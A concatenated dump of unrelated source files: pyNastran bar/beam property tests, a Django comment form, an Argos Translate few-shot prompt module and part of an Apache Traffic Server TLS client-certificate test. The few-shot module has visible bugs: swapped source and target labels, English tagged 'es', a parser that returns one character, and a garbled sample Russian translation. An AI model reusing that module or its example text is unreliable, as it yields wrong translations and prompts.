self.assertEqual(pbar.k2, None)
self.assertEqual(pbar.nsm, nsm)
assert np.allclose(pbar.Area(), area)
assert np.allclose(pbar.I11(), i11)
assert np.allclose(pbar.I22(), i22)
assert np.allclose(pbar.I12(), i12)
assert np.allclose(pbar.J(), j)
assert np.allclose(pbar.Nsm(), nsm)
def test_pbar_2(self):
"""tests the PBAR BDF add"""
pid = 1
mid = 2
A = None
I1 = I2 = None
J = None
nsm = None
c1 = c2 = d1 = d2 = e1 = e2 = f1 = f2 = None
k1 = k2 = None
i12 = 3.
fields = [
'PBAR', pid, mid, A, I1, I2, J, nsm, None,
c1, c2, d1, d2, e1, e2, f1, f2,
k1, k2, i12
]
card = print_card_8(fields)
lines = card.split('\n')
model = BDF(debug=False)
card = model._process_card(lines)
cardi = BDFCard(card)
pbar = PBAR.add_card(cardi)
self.assertEqual(pbar.pid, 1)
self.assertEqual(pbar.mid, 2)
self.assertEqual(pbar.A, 0.0)
self.assertEqual(pbar.i1, 0.0)
self.assertEqual(pbar.i2, 0.0)
self.assertEqual(pbar.j, 0.0)
self.assertEqual(pbar.nsm, 0.0)
self.assertEqual(pbar.i12, 3.0)
self.assertEqual(pbar.c1, 0.0)
self.assertEqual(pbar.c2, 0.0)
self.assertEqual(pbar.d1, 0.0)
self.assertEqual(pbar.d2, 0.0)
self.assertEqual(pbar.e1, 0.0)
self.assertEqual(pbar.e2, 0.0)
self.assertEqual(pbar.k1, None)
self.assertEqual(pbar.k2, None)
#--------------------------------------------------------
A = 6.
I1 = 5.
I2 = 4.
J = 3.
nsm = 2.
c1 = c2 = d1 = d2 = e1 = e2 = f1 = f2 = None
k1 = k2 = 1e2
i12 = 0.
fields = [
'PBAR', pid, mid, A, I1, I2, J, nsm, None,
c1, c2, d1, d2, e1, e2, f1, f2,
k1, k2, i12]
card = print_card_8(fields)
lines = card.split('\n')
model = BDF(debug=False)
card = model._process_card(lines)
cardi = BDFCard(card)
pbar = PBAR.add_card(cardi)
self.assertEqual(pbar.pid, 1)
self.assertEqual(pbar.mid, 2)
self.assertEqual(pbar.A, 6.0)
self.assertEqual(pbar.i1, 5.0)
self.assertEqual(pbar.i2, 4.0)
self.assertEqual(pbar.j, 3.0)
self.assertEqual(pbar.nsm, 2.0)
self.assertEqual(pbar.i12, 0.0)
self.assertEqual(pbar.c1, 0.0)
self.assertEqual(pbar.c2, 0.0)
self.assertEqual(pbar.d1, 0.0)
self.assertEqual(pbar.d2, 0.0)
self.assertEqual(pbar.e1, 0.0)
self.assertEqual(pbar.e2, 0.0)
self.assertEqual(pbar.k1, 1e2)
self.assertEqual(pbar.k2, 1e2)
def test_pbar_3(self):
"""tests the PBAR validate"""
pid = 42
mid = 10
i1 = -1.
i2 = -2.
i12 = -3.
j = -4.
pbar = PBAR(pid, mid, A=0., i1=i1, i2=i2, i12=i12, j=j, nsm=0., c1=0., c2=0.,
d1=0., d2=0., e1=0., e2=0., f1=0., f2=0., k1=1.e8,
k2=1.e8, comment='pbar')
with self.assertRaises(ValueError):
pbar.validate()
pbar.i1 = 1.
with self.assertRaises(ValueError):
pbar.validate()
pbar.i2 = 2.
with self.assertRaises(ValueError):
pbar.validate()
pbar.j = 4.
pbar.validate()
model = BDF(debug=False)
pbar = model.add_pbar(pid, mid, A=0., i1=2., i2=2., i12=1., j=4., nsm=0., c1=0., c2=0.,
d1=0., d2=0., e1=0., e2=0., f1=0., f2=0., k1=1.e8,
k2=1.e8, comment='pbar')
pbar.validate()
nids = [100, 101]
eid = 1000
x = [0., 0., 1.]
g0 = None
model.add_cbar(eid, pid, nids, x, g0, comment='cbar')
model.add_grid(100, [0., 0., 0.])
model.add_grid(101, [1., 0., 0.])
E = 3.0e7
G = None
nu = 0.3
model.add_mat1(mid, E, G, nu)
save_load_deck(model)
def test_cbar_g0(self):
"""modification of test_cbeam_01"""
model = BDF(debug=False)
pid = 200
mid = 6
model.add_pbar(pid, mid, A=0., i1=2., i2=2., i12=1., j=4., nsm=0., c1=0., c2=0.,
d1=0., d2=0., e1=0., e2=0., f1=0., f2=0., k1=1.e8,
k2=1.e8, comment='pbar')
eid = 100
nids = [10, 20]
x = None
g0 = 30
cbar = model.add_cbar(eid, pid, nids, x, g0, comment='cbar')
cbar.write_card_16(is_double=False)
E = 1.0e7
G = None
nu = 0.3
model.add_mat1(mid, E, G, nu)
model.add_grid(10, [0., 0., 0.])
model.add_grid(20, [0., 1., 0.])
model.add_grid(30, [0., 2., 0.])
model.cross_reference()
save_load_deck(model)
def test_pbarl_1(self):
"""tests the PBARL"""
model = BDF(log=None, debug=False)
pid = 4
mid = 40
group = 'group'
Type = 'bad_type'
dim = 42
nsm = 0.5
pbarl = PBARL(pid, mid, Type, dim, group=group, nsm=nsm, comment='comment')
with self.assertRaises(ValueError): # Type
pbarl.validate()
pbarl.Type = 'TUBE'
with self.assertRaises(TypeError): # dim
pbarl.validate()
pbarl.dim = [20.]
with self.assertRaises(RuntimeError):
pbarl.validate()
pbarl.dim = [2., 1.]
#with self.assertRaises(ValueError):
#pbarl.validate()
#pbarl.group = 'MSCBML0'
pbarl.validate()
str(pbarl)
pbarl.write_card(size=8, is_double=False)
pbarl.write_card(size=16, is_double=False)
pbarl.write_card(size=16, is_double=True)
model.properties[pid] = pbarl
nid1 = 52
xyz1 = [0., 0., 0.]
model.nodes[nid1] = GRID(nid1, cp=0, xyz=xyz1)
nid2 = 53
xyz2 = [1., 0., 0.]
model.nodes[nid2] = GRID(nid2, cp=0, xyz=xyz2)
E = 30.0e7
G = None
nu = 0.3
mat = MAT1(mid, E, G, nu, rho=1.0)
model.materials[mid] = mat
eid = 42
x = None
g0 = None
cbar = CBAR(eid, pid, [nid1, nid2], x, g0, offt='GGG',
pa=0, pb=0, wa=None, wb=None, comment='')
with self.assertRaises(ValueError):
cbar.validate()
cbar.x = [0., 1., 2.]
cbar.validate()
model.elements[eid] = cbar
pbarl._verify(xref=False)
model.validate()
model.cross_reference()
pbarl._verify(xref=True)
assert np.allclose(cbar.Mass(), 9.9247779608), cbar.Mass()
mat.rho = 0.
assert np.allclose(cbar.Mass(), 0.5), cbar.Mass()
scale = 'FR'
x = [0.2, 0.4, 0.6, 0.8]
model.add_cbarao(eid, scale, x, comment='cbarao')
model.add_card(['CBARAO', eid+1, 'RF', 6, 0.1, 0.2], 'CBARAO')
save_load_deck(model, run_quality=False, run_test_bdf=False)
def test_bar_mass_1(self):
"""tests CBAR/PBAR mass"""
model = BDF(debug=False)
#model.case_control_deck = CaseControlDeck(case_control_lines)
spc = ['SPC1', 123456, 123456, 1]
grid1 = ['GRID', 1, None, 0., 0., 0.]
grid2 = ['GRID', 2, None, 1., 0., 0.]
#grid3 = ['GRID', 3, None, 1., 0., 0.]
force = ['FORCE', 100, 1, 0, 2., 3., 4.]
pid = 11
mid = 12
cbar = [
'CBAR', 10, pid, 1, 2, 0., 1., 0., None,
]
k1 = k2 = None
area = 2.0
rho = 3.
nu = 0.3
i1 = 2.1
i2 = 1.2
i12 = 0.1
j = None
nsm = 0.1
pbar = [
'PBAR', pid, mid, area, i1, i2, j, nsm,
None, None, None, None, None, None, None, None,
k1, k2, i12
]
mat1 = ['MAT1', mid, 3.0e7, None, nu, rho]
model.add_card(grid1, 'GRID')
model.add_card(grid2, 'GRID')
model.add_card(cbar, 'CBAR')
model.add_card(pbar, 'PBAR')
model.add_card(mat1, 'MAT1')
model.add_card(spc, 'SPC1')
model.add_card(force, 'FORCE')
model.validate()
model.cross_reference()
mass, unused_cg, unused_I = mass_properties(
model,
element_ids=None, mass_ids=None,
reference_point=None,
sym_axis=None,
scale=None)
#print('cg* =', cg)
L = 1.0
mass_per_length = area * rho + nsm
mass = L * mass_per_length
#xcg = (0.0 * mass_a + 1.0 * mass_b) / (mass_a + mass_b)
#print(mass_a, mass_b, xcg, mass_a + mass_b)
#print('mass =', mass)
#cbar = CBEAM()
cbar = model.elements[10]
pbar = model.properties[11]
assert pbar.Nu() == nu, 'pbar.Nu()=%s nu=%s' % (pbar.Nu(), nu)
assert pbar.Rho() == rho, 'pbar.Rho()=%s rho=%s' % (pbar.Rho(), rho)
assert np.allclose(cbar.Length(), 1.0), cbar.Length()
#assert np.allclose(cbar.Mass(), 10.25), cbar.Mass()
#assert np.allclose(cbar.MassPerLength(), 10.25), cbar.MassPerLength()
#assert np.allclose(mass, 10.25), mass
case_control_lines = (
'SOL 101\n'
'CEND\n'
'SUBCASE 1\n'
' STRESS(PLOT,SORT1,REAL) = ALL\n'
' SPC = 123456\n'
' LOAD = 100\n'
'BEGIN BULK\n'
'PARAM,GRDPNT,0\n'
'PARAM,POST,-1\n'
'PARAM POSTEXT YES\n'
)
with open('cbar.bdf', 'w') as bdf_file:
bdf_file.write(case_control_lines)
model.write_bdf(bdf_file, enddata=True)
model2 = BDF(debug=False)
model2.read_bdf('cbar.bdf')
model2._verify_bdf(xref=True)
if not os.path.exists('cbar.op2') and 0:
os.system('nastran scr=yes bat=no old=no cbar.bdf')
os.remove('cbar.bdf')
if 0: # pragma: no cover
from pyNastran.op2.op2 import OP2
op2 = OP2()
op2.read_op2('cbar.op2')
#os.remove('cbar.op2')
gpw = op2.grid_point_weight
op2_mass = gpw.mass.max()
assert np.allclose(op2_mass, mass), 'op2_mass=%s mass=%s' % (op2_mass, mass)
#print('op2_mass=%s mass=%s' % (op2_mass, mass))
unused_op2_cg = gpw.cg
unused_cg = np.array([0.5, 0., 0.], dtype='float32')
#print('cg =', op2_cg)
def test_bar_mass_2(self):
"""CBAR/PBARL"""
model = BDF(debug=False)
model.add_grid(1, [0., 0., 0.])
model.add_grid(2, [1., 0., 0.])
model.add_grid(3, [0., 1., 0.])
mid = 1
E = 3.0e7
G = None
nu = 0.3
model.add_mat1(mid, E, G, nu, rho=1.)
#---------------------------------------------------------------
eid = 1
pid = 101
nids = [1, 2]
x = [0., 0., 1.]
g0 = None
unused_cbar = model.add_cbar(eid, pid, nids, x, g0, offt='GGG',
pa=0, pb=0, wa=None, wb=None,
comment='CBAR')
Type = 'BOX'
dim = [1., 2., 0.1, 0.1]
#pbeaml = model.add_pbeaml(pid, mid, Type, xxb, dims, nsm=None,
#so=None, comment='PBEAML')
unused_pbarl = model.add_pbarl(pid, mid, Type, dim, group='MSCBML0', nsm=0.,
comment='PBARL')
#---------------------------------------------------------------
eid = 2
pid = 102
x = None
g0 = 3
unused_cbar = model.add_cbar(eid, pid, nids, x, g0, offt='GGG',
pa=0, pb=0, wa=None, wb=None,
comment='CBAR')
Type = 'BOX'
dim = [1., 2., 0.1, 0.1]
unused_pbarl = model.add_pbarl(pid, mid, Type, dim, group='MSCBML0', nsm=0.,
comment='PBARL')
#---------------------------------------------------------------
eid = 3
pid = 103
#cbar = model.add_cbar(eid, pid, nids, x, g0, offt='GGG',
#pa=42, pb=5, wa=None, wb=None,
#comment='CBAR')
unused_pbar = model.add_pbar(pid, mid, A=1., i1=0., i2=0., i12=0., j=0., nsm=0.1,
c1=0., c2=0.,
d1=0., d2=0.,
e1=0., e2=0.,
f1=0., f2=0.,
k1=1.e8, k2=1.e8,
comment='pbar')
#G = 3.0e7
#E = None
#nu = 0.3
#model.add_mat1(mid, E, G, nu, rho=0.0, a=0.0, tref=0.0, ge=0.0,
#St=0.0, Sc=0.0, Ss=0.0, mcsid=0,
#comment='')
#---------------------------------------------------------------
model.validate()
model.pop_parse_errors()
model._verify_bdf(xref=False)
model.cross_reference()
model.pop_xref_errors()
model._verify_bdf(xref=True)
model.uncross_reference()
def test_pbar_nsm(self):
model = BDF(debug=False)
pid = 1
mid = 1
nsm = 1.
area = 2.0
pbar = model.add_pbar(pid, mid, A=area, i1=0., i2=0., i12=0., j=0.,
nsm=nsm,
c1=0., c2=0., d1=0., d2=0.,
e1=0., e2=0., f1=0., f2=0.,
k1=1.e8, k2=1.e8,
comment='')
E = 1.0
G = None
nu = 0.3
mat1 = model.add_mat1(mid, E, G, nu)
#----------------
card_lines = [
'PBAR 2 1 2. 1.',
]
model.add_card(card_lines, 'PBAR', comment='', is_list=False,
has_none=True)
pbar2 = model.properties[2]
#------------------
model.cross_reference()
assert pbar.Nsm() == 1.0
assert pbar.Area() == 2.0
# mass/L = area*rho + nsm
assert pbar.MassPerLength() == 1.0
# area = 2.0
mat1.rho = 10.0
assert pbar.MassPerLength() == 21.0, pbar.MassPerLength()
assert pbar2.MassPerLength() == 21.0, pbar2.MassPerLength()
def test_pbarl_nsm(self):
model = BDF(debug=False)
pid = 1
mid = 1
bar_type = 'BAR'
dim = [1., 2.] # area = 2.0
pbarl = model.add_pbarl(pid, mid, bar_type, dim, group='MSCBML0', nsm=1.,
comment='')
E = 1.0
G = None
nu = 0.3
mat1 = model.add_mat1(mid, E, G, nu)
#----------------
card_lines = [
'PBARL 2 1 BAR',
' 1.0 2.0 1.0',
]
model.add_card(card_lines, 'PBARL', comment='', is_list=False,
has_none=True)
pbarl2 = model.properties[2]
#------------------
model.cross_reference()
assert pbarl.Nsm() == 1.0
assert pbarl.Area() == 2.0
# mass/L = area*rho + nsm
assert pbarl.MassPerLength() == 1.0
# area = 2.0
mat1.rho = 10.0
assert pbarl.MassPerLength() == 21.0, pbarl.MassPerLength()
assert pbarl2.MassPerLength() == 21.0, pbarl2.MassPerLength()
loadcase_id = 10
eid = 11
load_type = 'FZ'
x1 = 0.
x2 = None
p1 = 10.
scale = 'FR'
model.add_pload1(loadcase_id, eid, load_type, scale, x1, p1,
x2=x2, p2=None, comment='pload1')
scale = 'LE'
model.add_pload1(loadcase_id, eid, load_type, scale, x1, p1,
x2=x2, p2=None, comment='')
model.add_grid(1, [0., 0., 0.])
model.add_grid(2, [1., 0., 0.])
model.add_grid(3, [0., 1., 0.])
x = None
g0 = 3
model.add_cbar(eid, pid, [1, 2], x, g0)
model.cross_reference()
p0 = 1
eids = None
nids = None
force1, moment1 = sum_forces_moments(model, p0, loadcase_id,
include_grav=False, xyz_cid0=None)
force2, moment2 = sum_forces_moments_elements(model, p0, loadcase_id, eids, nids,
include_grav=False, xyz_cid0=None)
#print(force1, force2)
assert np.allclose(force1, force2), force1
assert np.allclose(moment1, moment2), moment1
save_load_deck(model, xref='standard', punch=True)
def test_baror(self):
"""tests a BAROR"""
model = BDF(debug=False)
n1 = 10
n2 = 20
model.add_grid(n1, [0., 0., 0.])
model.add_grid(n2, [1., 0., 0.])
pid = 2
mid = 1
bar_type = 'BAR'
dim = [1., 2.] # area = 2.0
unused_pbarl = model.add_pbarl(pid, mid, bar_type, dim, group='MSCBML0', nsm=1.,
comment='')
E = 3.0e7
G = None
nu = 0.3
model.add_mat1(mid, E, G, nu, rho=1.)
card_lines = ['BAROR', None, pid, None, None, 0.6, 2.9, -5.87, 'GOG']
model.add_card(card_lines, 'BAROR', comment='BAROR', is_list=True,
has_none=True)
eid = 1
card_lines = ['CBAR', eid, pid, n1, n2]
model.add_card(card_lines, 'CBAR', comment='', is_list=True, has_none=True)
model.pop_parse_errors()
save_load_deck(model)
def test_baror_2(self):
model = BDF(debug=False)
pid = 12
is_g0 = True
g0 = 42
x = None
baror = model.add_baror(pid, is_g0, g0, x, offt='GGG', comment='baror')
baror.raw_fields()
baror.write_card(size=8)
baror.write_card(size=16)
save_load_deck(model)
def test_cbend(self):
"""tests a CBEND"""
model = BDF(debug=False)
eid = 7
pid = 10
nids = [2, 3]
g0 = 5
x = None
geom = 1
cbend = model.add_cbend(eid, pid, nids, g0, x, geom, comment='cbend')
model.add_grid(2, [0., 0., 0.])
model.add_grid(3, [0., 0., 0.])
model.add_grid(5, [0., 0., 0.])
#pbend = model.add_pbend(pid, mid, beam_type, A, i1, i2, j,
#c1, c2, d1, d2, e1, e2, f1, f2,
#k1, k2, nsm, rc, zc, delta_n, fsi,
#rm, t, p, rb, theta_b, comment='')
cbend.validate()
cbend.raw_fields()
cbend.write_card()
cbend.write_card(size=16)
model.validate()
model._verify_bdf(xref=False)
model.pop_parse_errors()
#model.cross_reference()
#model.pop_xref_errors()
#model._verify_bdf(xref=True)
#model.uncross_reference()
def test_cbeam3(self):
"""tests a CBEAM3"""
model = BDF(debug=False)
model.add_grid(1, [0., 0., 0.])
model.add_grid(2, [0., 0., 0.])
model.add_grid(3, [0., 0., 0.])
model.add_grid(4, [0., 0., 0.])
eid = 1
pid = 2
nids = [1, 2, 3]
x = None
g0 = 4
cbeam3 = model.add_cbeam3(eid, pid, nids, x, g0, wa=None, wb=None, wc=None, tw=None, s=None, comment='cbeam3')
cbeam3.raw_fields()
A = 1.
iz = 2.
iy = 3.
mid = 4
pbeam3 = model.add_pbeam3(pid, mid, A, iz, iy, iyz=0., j=None,
nsm=0., cy=0., cz=0., dy=0., dz=0., ey=0., ez=0., fy=0., fz=0., comment='')
E = 3.0e7
G = None
nu = 0.3
model.add_mat1(mid, E, G, nu, rho=0.1)
str(cbeam3)
pbeam3s = str(pbeam3)
#print(pbeam3s)
str(pbeam3s)
card_lines = pbeam3s.split('\n')
cbeam3._verify(xref=False)
model.cross_reference()
model.uncross_reference()
del model.properties[pid]
model.cards_to_read.add('PBEAM3')
model.add_card(card_lines, 'PBEAM3', comment='', ifile=None, is_list=False, has_none=True)
model.pop_parse_errors()
model.pop_xref_errors()
assert pbeam3 == model.properties[pid]
def test_bar_area(self):
"""tests the PBARL"""
model = BDF(log=None, debug=False)
mid = 40
group = 'group'
nsm = 0.0
shape_dims_area = [
# name, dims, area, i1
('ROD', [2.], 4. * np.pi, 0.),
('TUBE', [5., 1.], 24. * np.pi, 0.),
('BAR', [2., 3.], 6., 0.),
('BOX', [2., 3., 0.5, 0.5], 4., 0.),
('L', [2., 3., 1., 1.], 4., 0.),
('CHAN', [10., 10., 1., 1.], 28., None),
('CHAN1', [9., 0.1, 8., 10.], 19., None),
('CHAN2', [1, 1., 9., 10.], 26., None),
# new
('I', [1., 1., 1., 0.1, 0.1, 0.1], 0.28, None),
('I1', [0.1, 1., 0.5, 1.], 1.05, None),
('H', [1.0, 0.1, 1.0, 0.1], 0.2, None),
('Z', [0.5, 0.5, 0.5, 1.], 0.75, None),
('Z', [0.8, 0.5, 0.5, 1.], 0.90, None),
('Z', [0.5, 0.8, 0.5, 1.], 1.05, None),
('Z', [0.5, 0.5, 0.8, 1.], 0.60, None),
('Z', [0.5, 0.5, 0.5, 2.], 1.75, None),
('CHAN', [1., 1., 0.1, 0.1], 0.28, None),
('CHAN1', [0.5, 0.5, 0.5, 1.], 0.75, None),
('CHAN2', [0.1, 0.1, 1., 1.], 0.28, None),
('CROSS', [0.1, 0.1, 1., 0.1], 0.11, None),
('HEXA', [0.1, 1., 1.], 0.90, None),
('HEXA', [0.2, 1., 1.], 0.80, None),
('HEXA', [0.1, 2., 1.], 1.90, None),
('HEXA', [0.1, 1., 2.], 1.80, None),
('HAT', [1., 0.1, 1., 0.1], 0.30, None),
('HAT', [2., 0.1, 1., 0.1], 0.50, None),
('HAT', [1., 0.2, 1., 0.1], 0.56, None),
('HAT', [1., 0.1, 2., 0.1], 0.40, None),
('HAT', [1., 0.1, 1., 0.2], 0.32, None),
('HAT1', [3., 1., 1., 0.1, 0.1], 0.76, None),
('HAT1', [3., 2., 1., 0.1, 0.1], 0.96, None),
('HAT1', [3., 1., 2., 0.1, 0.1], 0.76, None),
('HAT1', [3., 1., 1., 0.2, 0.1], 1.18, None),
('HAT1', [3., 1., 1., 0.1, 0.2], 1.04, None),
('T', [10., 10., 3., 0.5], 33.5, None),
('T2', [10., 5., 0.5, 2.0], 14., None), # ball,hall,tflange,tweb
('T', [1., 1., 0.1, 0.1], 0.19, None),
('T1', [1., 1., 0.1, 0.1], 0.20, None),
('T2', [1., 1., 0.1, 0.1], 0.19, None),
('DBOX', [2., 1., 1., 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, ], 0.64, None),
('DBOX', [2., 2., 1., 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, ], 0.94, None),
('DBOX', [2., 1., 2., 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, ], 0.64, None),
('DBOX', [2., 1., 1., 0.2, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, ], 0.72, None),
('DBOX', [2., 1., 1., 0.1, 0.2, 0.1, 0.1, 0.1, 0.1, 0.1, ], 0.72, None),
('DBOX', [2., 1., 1., 0.1, 0.1, 0.2, 0.1, 0.1, 0.1, 0.1, ], 0.72, None),
('DBOX', [2., 1., 1., 0.1, 0.1, 0.1, 0.2, 0.1, 0.1, 0.1, ], 0.725, None),
('DBOX', [2., 1., 1., 0.1, 0.1, 0.1, 0.1, 0.2, 0.1, 0.1, ], 0.725, None),
('DBOX', [2., 1., 1., 0.1, 0.1, 0.1, 0.1, 0.1, 0.2, 0.1, ], 0.725, None),
('DBOX', [2., 1., 1., 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.2, ], 0.725, None),
]
pid = 1
for bar_type, dims, areai, i1 in shape_dims_area:
pbarl = PBARL(pid, mid, bar_type, dims, group=group, nsm=nsm, comment='comment')
pbarl.validate()
area2 = pbarl.Area()
if i1 is not None:
pbarl.I1()
pbarl.I2()
pbarl.I12()
assert np.allclose(areai, area2), 'bar_type=%r dims=%s area=%s area_expected=%s' % (bar_type, dims, area2, areai)
pid += 1
if __name__ == '__main__': # pragma: no cover
unittest.main()
|
airmozilla/comments/forms.py
|
RAMilewski/airmozilla
| 115 |
101146
|
<filename>airmozilla/comments/forms.py
from django import forms
from airmozilla.base.forms import BaseForm
from airmozilla.comments.models import Comment
class CommentForm(BaseForm):
name = forms.CharField(required=False)
comment = forms.CharField(widget=forms.Textarea)
reply_to = forms.IntegerField(required=False)
def clean_reply_to(self):
value = self.cleaned_data['reply_to']
if value:
try:
value = Comment.objects.get(pk=value)
except Comment.DoesNotExist:
raise forms.ValidationError('Invalid reply_to')
return value
|
argostranslate/fewshot.py
|
argosopentechnologies/Argos-Translate
| 1,114 |
101151
|
prompt = """Translate to French (fr)
From English (es)
==========
Bramshott is a village with mediaeval origins in the East Hampshire district of Hampshire, England. It lies 0.9 miles (1.4 km) north of Liphook. The nearest railway station, Liphook, is 1.3 miles (2.1 km) south of the village.
----------
Bramshott est un village avec des origines médiévales dans le quartier East Hampshire de Hampshire, en Angleterre. Il se trouve à 0,9 miles (1,4 km) au nord de Liphook. La gare la plus proche, Liphook, est à 1,3 km (2,1 km) au sud du village.
==========
Translate to Russian (rs)
From German (de)
==========
Der Gewöhnliche Strandhafer (Ammophila arenaria (L.) Link; Syn: Calamagrostis arenaria (L.) Roth) – auch als Gemeiner Strandhafer, Sandrohr, Sandhalm, Seehafer oder Helm (niederdeutsch) bezeichnet – ist eine zur Familie der Süßgräser (Poaceae) gehörige Pionierpflanze.
----------
Обычная пляжная овсянка (аммофила ареалия (л.) соединение; сина: каламагростисная анария (л.) Рот, также называемая обычной пляжной овцой, песчаной, сандалмой, морской орой или шлемом (нижний немецкий) - это кукольная станция, принадлежащая семье сладких трав (поа).
==========
"""
def generate_prompt(text, from_name, from_code, to_name, to_code):
# TODO: document
to_return = prompt
to_return += "Translate to "
if from_name:
to_return += from_name
if from_code:
to_return += " (" + from_code + ")"
to_return += "\nFrom "
if to_name:
to_return += to_name
if from_code:
to_return += " (" + to_code + ")"
to_return += "\n" + "=" * 10 + "\n"
to_return += text
to_return += "\n" + "-" * 10 + "\n"
return to_return
def parse_inference(output):
end_index = output.find("=" * 10)
if end_index != -1:
return output[end_index]
end_index = output.find("-" * 10)
if end_index != -1:
return output[end_index]
return output
|
tests/gold_tests/tls/tls_client_cert_override_plugin.test.py
|
cmcfarlen/trafficserver
| 1,351 |
101163
|
<gh_stars>1000+
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import subprocess
import os
Test.Summary = '''
Test conf_remp to specify different client certificates to offer to the origin. Loading certs/keys via plugin.
'''
ts = Test.MakeATSProcess("ts", command="traffic_manager", select_ports=True)
cafile = "{0}/signer.pem".format(Test.RunDirectory)
cafile2 = "{0}/signer2.pem".format(Test.RunDirectory)
server = Test.MakeOriginServer("server",
ssl=True,
options={"--clientCA": cafile,
"--clientverify": ""},
clientcert="{0}/signed-foo.pem".format(Test.RunDirectory),
clientkey="{0}/signed-foo.key".format(Test.RunDirectory))
server2 = Test.MakeOriginServer("server2",
ssl=True,
options={"--clientCA": cafile2,
"--clientverify": ""},
clientcert="{0}/signed2-bar.pem".format(Test.RunDirectory),
clientkey="{0}/signed-bar.key".format(Test.RunDirectory))
server3 = Test.MakeOriginServer("server3")
server.Setup.Copy("ssl/signer.pem")
server.Setup.Copy("ssl/signer2.pem")
server.Setup.Copy("ssl/signed-foo.pem")
server.Setup.Copy("ssl/signed-foo.key")
server.Setup.Copy("ssl/signed2-foo.pem")
server.Setup.Copy("ssl/signed2-bar.pem")
server.Setup.Copy("ssl/signed-bar.key")
server2.Setup.Copy("ssl/signer.pem")
server2.Setup.Copy("ssl/signer2.pem")
server2.Setup.Copy("ssl/signed-foo.pem")
server2.Setup.Copy("ssl/signed-foo.key")
server2.Setup.Copy("ssl/signed2-foo.pem")
server2.Setup.Copy("ssl/signed2-bar.pem")
server2.Setup.Copy("ssl/signed-bar.key")
request_header = {"headers": "GET / HTTP/1.1\r\nHost: example.com\r\n\r\n", "timestamp": "1469733493.993", "body": ""}
response_header = {
"headers": "HTTP/1.1 200 OK\r\nConnection: close\r\nCache-Control: no-cache\r\n\r\n",
"timestamp": "1469733493.993",
"body": ""}
server.addResponse("sessionlog.json", request_header, response_header)
request_header = {"headers": "GET / HTTP/1.1\r\nHost: bar.com\r\n\r\n", "timestamp": "1469733493.993", "body": ""}
response_header = {
"headers": "HTTP/1.1 200 OK\r\nCache-Control: no-cache\r\nConnection: close\r\n\r\n",
"timestamp": "1469733493.993",
"body": ""}
server.addResponse("sessionlog.json", request_header, response_header)
ts.addSSLfile("ssl/server.pem")
ts.addSSLfile("ssl/server.key")
ts.addSSLfile("ssl/signed-foo.pem")
ts.addSSLfile("ssl/signed-foo.key")
ts.addSSLfile("ssl/signed2-foo.pem")
ts.addSSLfile("ssl/signed-bar.pem")
ts.addSSLfile("ssl/signed2-bar.pem")
ts.addSSLfile("ssl/signed-bar.key")
ts.Disk.sni_yaml.AddLine('sni:')
ts.Disk.sni_yaml.AddLine('- fqdn: random')
ts.Disk.sni_yaml.AddLine(' verify_server_properties: NONE')
snipath = ts.Disk.sni_yaml.AbsPath
Test.PrepareTestPlugin(os.path.join(Test.Variables.AtsTestPluginsDir, 'ssl_secret_load_test.so'), ts)
shortdir = ts.Variables.SSLDir[0:ts.Variables.SSLDir.rfind("/")]
ts.Disk.records_config.update({
'proxy.config.ssl.server.cert.path': '{0}'.format(ts.Variables.SSLDir),
'proxy.config.ssl.server.private_key.path': '{0}'.format(ts.Variables.SSLDir),
'proxy.config.ssl.client.verify.server.policy': 'PERMISSIVE',
'proxy.config.ssl.client.cert.path': '{0}'.format(shortdir),
'proxy.config.ssl.client.cert.filename': 'signed-foo.pem',
'proxy.config.ssl.client.private_key.path': '{0}'.format(shortdir),
'proxy.config.ssl.client.private_key.filename': 'signed-foo.key',
'proxy.config.exec_thread.autoconfig.scale': 1.0,
'proxy.config.url_remap.pristine_host_hdr': 1,
'proxy.config.diags.debug.enabled': 1,
'proxy.config.diags.debug.tags': 'ssl_secret_load|http|ssl',
})
ts.Disk.ssl_multicert_config.AddLine(
'dest_ip=* ssl_cert_name=server.pem ssl_key_name=server.key'
)
ts.Disk.remap_config.AddLine(
'map /case1 https://127.0.0.1:{0}/ @plugin=conf_remap.so @pparam=proxy.config.ssl.client.cert.filename={1} plugin=conf_remap.so @pparam=proxy.config.ssl.client.private_key.filename={2}'.format(
server.Variables.SSL_Port,
"signed-foo.pem",
"signed-foo.key"))
ts.Disk.remap_config.AddLine(
'map /badcase1 https://127.0.0.1:{0}/ @plugin=conf_remap.so @pparam=proxy.config.ssl.client.cert.filename={1} plugin=conf_remap.so @pparam=proxy.config.ssl.client.private_key.filename={2}'.format(
server.Variables.SSL_Port,
"signed2-foo.pem",
"signed-foo.key"))
ts.Disk.remap_config.AddLine(
'map /case2 https://127.0.0.1:{0}/ @plugin=conf_remap.so @pparam=proxy.config.ssl.client.cert.filename={1} plugin=conf_remap.so @pparam=proxy.config.ssl.client.private_key.filename={2}'.format(
server2.Variables.SSL_Port,
"signed2-foo.pem",
"signed-foo.key"))
ts.Disk.remap_config.AddLine(
'map /badcase2 https://127.0.0.1:{0}/ @plugin=conf_remap.so @pparam=proxy.config.ssl.client.cert.filename={1} plugin=conf_remap.so @pparam=proxy.config.ssl.client.private_key.filename={2}'.format(
server2.Variables.SSL_Port,
"signed-foo.pem",
"signed-foo.key"))
# Should succeed
tr = Test.AddTestRun("Connect with correct client cert to first server")
tr.Processes.Default.StartBefore(Test.Processes.ts)
tr.Processes.Default.StartBefore(server)
tr.Processes.Default.StartBefore(server2)
tr.StillRunningAfter = ts
tr.StillRunningAfter = server
tr.StillRunningAfter = server2
tr.Processes.Default.Command = "curl -H host:example.com http://127.0.0.1:{0}/case1".format(ts.Variables.port)
tr.Processes.Default.ReturnCode = 0
tr.Processes.Default.Streams.stdout = Testers.ExcludesExpression("Could Not Connect", "Check response")
# Should fail
trfail = Test.AddTestRun("Connect with bad client cert to first server")
